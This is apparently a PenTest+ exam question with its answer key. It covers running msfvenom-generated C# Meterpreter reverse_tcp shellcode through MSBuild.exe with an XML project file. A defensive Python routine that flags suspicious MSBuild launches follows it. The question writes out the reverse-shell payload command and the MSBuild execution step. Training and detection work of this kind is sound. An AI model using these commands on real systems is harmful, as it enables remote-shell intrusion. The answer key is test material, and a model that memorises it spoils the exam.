CompTIA PenTest+ (PT0-003) — Question 28
A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?
Answer options
- A. regsvr32 /s /n /u C:\evil.xml
- B. MSBuild.exe C:\evil.xml
- C. mshta.exe C:\evil.xml
- D. AppInstaller.exe C:\evil.xml
Correct answer: B
Explanation
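The correct answer is B. MSBuild.exe is the Microsoft build engine, and it processes XML project files, which can contain inline C# code that is compiled and run when the file is built. That matches the C#-formatted shellcode (-f csharp) that the tester placed in evil.xml, so running MSBuild.exe C:\evil.xml allows the tester to continue the attack. The other options are also related to file execution, but none of them builds an XML project file, so they are not suited to executing the shellcode contained in evil.xml.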
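From the defender's side, the MSBuild launch in answer B is visible in process-creation logs. The following is an added example, not part of the original question: a small detection routine run over constructed sample events. The event field names (image, command_line, parent_image) and the allow-list of build parents are assumptions to adapt to your own telemetry.

```python
import ntpath
import re

# Extensions normally passed to MSBuild; any other input file (e.g. .xml) is unusual.
PROJECT_EXTS = {".csproj", ".vbproj", ".vcxproj", ".fsproj", ".sln", ".proj", ".targets", ".props"}
# Assumed allow-list of parents that legitimately start builds; tune per environment.
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}

def split_args(command_line):
    """Split a Windows command line on whitespace, keeping quoted spans together."""
    tokens = re.findall(r'(?:[^\s"]|"[^"]*")+', command_line)
    return [t.replace('"', "") for t in tokens]

def review_event(event):
    """Return the reasons an MSBuild launch looks suspicious (empty list = no alert)."""
    if ntpath.basename(event["image"]).lower() != "msbuild.exe":
        return []
    reasons = []
    args = split_args(event["command_line"])[1:]  # drop the executable itself
    for arg in args:
        if arg.startswith(("/", "-")):  # MSBuild switches, not input files
            continue
        if ntpath.splitext(arg)[1].lower() not in PROJECT_EXTS:
            reasons.append("non-project input file: " + arg)
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent not in BUILD_PARENTS:
        reasons.append("unexpected parent: " + parent)
    return reasons

MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"image": MSBUILD, "parent_image": r"C:\VS\Common7\IDE\devenv.exe",
     "command_line": MSBUILD + r' "C:\src\My App\App.csproj" /p:Configuration=Release'},
    {"image": MSBUILD, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"MSBuild.exe C:\evil.xml"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\evil.xml"},
]

def flag_events(events):
    """Map event index -> reasons for every event that raised at least one reason."""
    return {i: r for i, e in enumerate(events) if (r := review_event(e))}

if __name__ == "__main__":
    for index, reasons in flag_events(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["command_line"], reasons)
```

Only the second sample event is flagged: the developer build of a .csproj from devenv.exe and the notepad.exe launch raise no reasons.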